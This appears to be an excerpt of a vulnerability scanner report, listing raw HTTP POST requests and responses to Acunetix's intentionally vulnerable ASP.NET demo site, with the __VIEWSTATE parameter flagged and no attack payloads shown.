Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8396&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAKUyd59oIZGRkQhxx2cQtgWTZdAwo4f7btbHttjw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLY5ffCDgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVXm6%2BMLVZINmqkquZAvsaEPGWcKA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:07 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAKUyd59oIZGRkQhxx2cQtgWTZdAwo4f7btbHttjw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLY5ffCDgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVXm6+MLVZINmqkquZAvsaEPGWcKA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:White" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8412&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAxfIv9NoIZGRkR22Q8tO4zxcjEVIA%2FDRYc79kKKI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpitbeCQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVb79UCdSU2r3GssPNsH1F5ytjncA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:38 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAxfIv9NoIZGRkR22Q8tO4zxcjEVIA/DRYc79kKKI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpitbeCQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVb79UCdSU2r3GssPNsH1F5ytjncA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:White" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
